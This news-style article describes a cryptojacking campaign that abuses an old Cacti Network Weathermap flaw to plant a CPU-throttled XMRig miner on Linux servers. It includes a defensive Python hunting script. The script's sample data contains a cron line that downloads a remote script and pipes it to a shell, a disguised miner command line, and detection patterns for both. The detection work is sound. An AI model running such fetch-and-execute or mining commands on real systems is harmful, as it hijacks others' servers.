Guess what the favorite tool of hackers is when they want to infect Linux servers with crypto-mining malware. It is a five-year-old security vulnerability that is being exploited in a cryptojacking campaign. The miner itself is a modified build of XMRig, a legitimate, open-source Monero miner.
The flaw was discovered in 2013 in the Network Weathermap plug-in for Cacti, a tool administrators use to visualize network activity. The latest crypto-mining use of it was discovered by researchers from Trend Micro, who believe the campaign is still active.
The key targets of this campaign are publicly accessible x86-64 Linux web servers, and the attack is not limited to any single region: web servers across the globe are being hit. The United States, Japan, Taiwan, India, and China were identified as the top targets.
One wonders how such a critical flaw has gone unpatched on so many systems, given that a fix has been available for five years. Nevertheless, hackers are still making merry with it to mine cryptocurrency. The vulnerability lets attackers modify code on the web server so that it installs the crypto-miner on the machine. The installation is then repeated every three minutes so that the miner is restarted if someone kills it or restarts the system. The exploit itself is delivered as an ordinary web request to the vulnerable plug-in on the web server.
The attackers evade detection by configuring the XMRig tool to run discreetly. The hacker simply caps the percentage of CPU the miner may use, which lowers the chance that a spike in load gives the miner away.
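Two behaviours described above are worth hunting for directly: a cron job that re-fetches and re-runs a remote script every few minutes, and a miner process whose CPU share is deliberately capped so that a "high CPU" alert never fires. The script below is an added example written for this article, not code from Trend Micro or from the XMRig project. Every crontab line and `ps` line in it is constructed sample data; the IP addresses, the `/var/tmp/.sys` path, the pool hostname and the `--max-cpu-usage` option are assumptions used for illustration (the option name is taken from older XMRig builds and may differ in current ones).

```python
"""Heuristic hunt for cron-based miner persistence and throttled miner processes.

All input below is constructed sample data standing in for `crontab -l` and
`ps -eo pid,pcpu,user,args` output on a compromised Cacti host.
"""
import re

# Constructed crontab. Note the legitimate Cacti poller also runs every five
# minutes, so a short interval on its own is not evidence of compromise.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/3 * * * * curl -fsSL http://198.51.100.7/run.sh | sh
*/5 * * * * /usr/bin/php /usr/share/cacti/poller.php > /dev/null 2>&1
"""

# Constructed process listing. The miner (pid 1337) is capped at 50% CPU and
# backgrounded, so a threshold such as ">90% CPU" would never catch it.
SAMPLE_PS = """\
  PID %CPU USER     COMMAND
  812  0.3 root     /usr/sbin/sshd -D
 1337 48.0 www-data /var/tmp/.sys -o stratum+tcp://pool.example:3333 --max-cpu-usage 50 --background
 2201  1.2 www-data /usr/sbin/apache2 -k start
"""

# A remote fetch whose output is piped straight into a shell.
FETCH_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# Strings that rarely appear in a legitimate web-server command line.
MINER_HINTS = ("stratum+tcp://", "stratum+ssl://", "xmrig", "--max-cpu-usage", "--donate-level")


def suspicious_cron(crontab_text, max_interval_minutes=10):
    """Return crontab lines that run at a short interval and fetch-and-execute remote content."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # m h dom mon dow command
        if len(fields) < 6:
            continue
        step = re.fullmatch(r"\*/(\d+)", fields[0])
        short_interval = step is not None and int(step.group(1)) <= max_interval_minutes
        if short_interval and FETCH_EXEC.search(fields[5]):
            hits.append(line)
    return hits


def suspicious_processes(ps_text, cpu_floor=0.0):
    """Return (pid, pcpu, args) for processes whose command line carries miner indicators.

    The command line is the primary signal; cpu_floor is optional and defaults to 0
    precisely because this campaign throttles the miner.
    """
    hits = []
    for line in ps_text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, pcpu, _user, args = parts
        lowered = args.lower()
        if any(hint in lowered for hint in MINER_HINTS) and float(pcpu) >= cpu_floor:
            hits.append((int(pid), float(pcpu), args))
    return hits


def cpu_cap(args):
    """Extract the CPU percentage a throttled miner was told to stay under, if any."""
    m = re.search(r"--max-cpu-usage[= ](\d+)", args)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    for entry in suspicious_cron(SAMPLE_CRONTAB):
        print("persistence:", entry)
    for pid, pcpu, args in suspicious_processes(SAMPLE_PS):
        print(f"miner pid={pid} cpu={pcpu}% cap={cpu_cap(args)} cmd={args}")
```

Run against the constructed data, the cron check flags only the three-minute `curl ... | sh` entry and leaves the five-minute Cacti poller alone, and the process check finds the miner at 48% CPU, a value that a naive "is the box pegged?" rule would ignore. On a real host, feed it the output of `crontab -l` for each user (including `www-data`) and `/etc/cron.d`, plus `ps -eo pid,pcpu,user,args`.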
The wallets used by the miners have also been identified by the researchers. One of the attackers received 320 Monero (approximately $75,000), according to Trend Micro. That is only a small proportion of what the attackers are likely making through this campaign; the researchers estimate the take could be as much as $3 million in cryptocurrency.
To protect your server from being turned into a crypto-mining tool, keep the system patched. Those who run Cacti's Network Weathermap plug-in should also keep Cacti and its data off publicly reachable servers. In the company's official blog post, Trend Micro researchers noted:
“Data from Cacti should be properly kept internal to the environment. Having this data exposed represents a huge risk in terms of operational security. While this allows systems or network administrators to conveniently monitor their environments, it also does the same for threat actors.”